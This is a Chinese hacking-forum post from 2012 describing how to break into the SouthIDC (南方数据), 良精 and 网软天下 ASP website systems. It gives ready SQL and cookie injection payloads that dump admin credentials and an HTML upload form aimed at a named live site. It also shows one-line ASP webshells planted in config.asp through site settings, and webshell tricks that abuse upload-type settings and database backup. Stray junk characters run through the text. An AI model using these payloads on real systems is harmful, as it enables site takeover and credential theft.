找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2623|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb4 O1 A; ?! o& j0 J2 O$ U
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
2 a- @( f5 j6 ?3 v( m  e也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
" _6 b0 D' m/ X直接暴管理员帐号密码(md5)
; a" g7 J5 A8 s9 u  H) Z' `0 i0 w2.登陆后台
' y; A6 v. q, l& S: T" j4 u3.利用编辑器上传:
. E  ^/ }. h7 V% I" D访问admin/southidceditor/admin_style.asp
* J9 s9 Q+ H6 l修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.: c5 ?; H5 ~7 N7 n. P( z9 I+ s
# w- K$ i0 k% F: _
========================================
1 o) O) J+ F, C" B; J  u
# L' Q8 G& S$ h2 d参考资料整理:* @. L$ C" i$ o! K* c# U
南方数据、良精系统、网软天下漏洞利用" c% M1 }4 F% H2 ?3 A7 M
- m' ?0 S6 ~# \' x
1、通过upfile_other.asp漏洞文件直接取SHELL6 D7 Y) w* }7 e4 }. p! U
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:6 h5 B- p& p" L* L
<HTML><HEAD> 8 y$ _0 z6 D' q  j8 n+ A, {2 r- j
<META http-equiv=Content-Type content="text/html; charset=gb2312"> - D6 K+ S+ ?" x& _
<STYLE type=text/css>BODY {
: i" S+ C. ^( J7 m6 NFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee 0 U" u% M. ^! D6 Z  J. p( Z& J  |
} % E0 |4 `7 i& B7 v
.tx1 { ! }- S. X; `* J; [; c+ O. f: h- B% v
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px ) }+ \- v# x6 r9 U( ~
} / F) y2 _5 r3 N+ I: x! \) {
</STYLE>, y8 a# M3 w7 x
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
/ m( v) d1 F9 x# _/ c) z: c8 h" S<BODY leftMargin=0 topMargin=0> 2 M1 o. S$ T2 \' K9 ^( c5 v
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post 1 ^( b5 ?* a5 E- S% R6 ^7 M. W
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
, \- j, K1 u4 O" c( X" W<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>4 l+ e- F% U( z
! y" B9 C2 m2 @8 Z
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。5 f( m. C* C2 I+ d/ h) K, R
注:此方法通杀南方数据、良精系统、网软天下等) }0 G& a4 r( w6 K" W
5 {# E/ y& K$ o- i, D# {& A3 ]
2、通过注入秒杀管理员帐号密码,使用如下:. h0 Y5 v/ x$ n" P9 i# L) H' Q6 l! e0 z
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
5 c9 e* k# }( c: _5 D  h以上代码直接暴管理员帐号和密码,取SHELL方法如下:
3 R4 J' n0 N# O( C在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
# Z  ]* F+ p) }# `' h成功把shell写入http://www.target.com/inc/config.asp, u. h7 g0 y, m: ]9 |8 i1 r
这里一句话chr(32)密码是“#”
7 r# h" m4 `/ h' y& k# V3、cookie注入4 v6 p4 |! ~2 h: }1 x
清空地址栏,利用union语句来注入,提交:
! J' ^: a4 \( Y1 r' p# Wjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))& A% v! U- z2 m0 Q2 s
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?$ k" A1 F1 g- k4 ~8 t! L
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。+ L9 J0 c9 @& C0 D
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)8 O$ h% g5 m: s8 K, f6 Z

8 H6 \, _9 d: g7 r" g7 y三、后台取SHELL方法总结
& G- ]4 ?9 ~+ ]+ j( n$ s4 `; v. M(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
# L+ S4 f6 l9 w8 i$ r然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了," f- S9 [% @9 n9 M& R1 W/ o
这时再打开一句话马的客户端,提交同样得到一个小马
) @. i$ S- S% v+ g+ |(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
9 k  \5 R9 N- A+ U3 R8 r(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:* U1 b/ z+ Y* s" R  O
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
* B% f8 I: P, O8 d* G" o3 nEnableUpload=false* J* A( d" B  Q2 {

1 |0 C! a3 n5 w/ Cend if $ U" H9 D' Z2 Z" F* R- y2 e# X
if EnableUpload=false then4 r% z' B# |" d' K) E. I
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
3 P! ?/ [- ?4 K+ ]: `FoundErr=true
) D* T3 W0 T/ L( e1 Cend if
2 z: K- V* n( G5 C- y  V8 K0 R大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
& k# |+ {- w: k" V+ _/ [+ T提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
! u' _3 V& \; e2 [(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
4 }8 _0 m9 \2 h. D/ X- ~
# ]# u, E/ ~" b. x点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的  _/ V; a. [+ A4 X) D; j
直接访问备份后的地址,就得到一个webshell* u% p3 U3 R+ t$ W7 Q
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表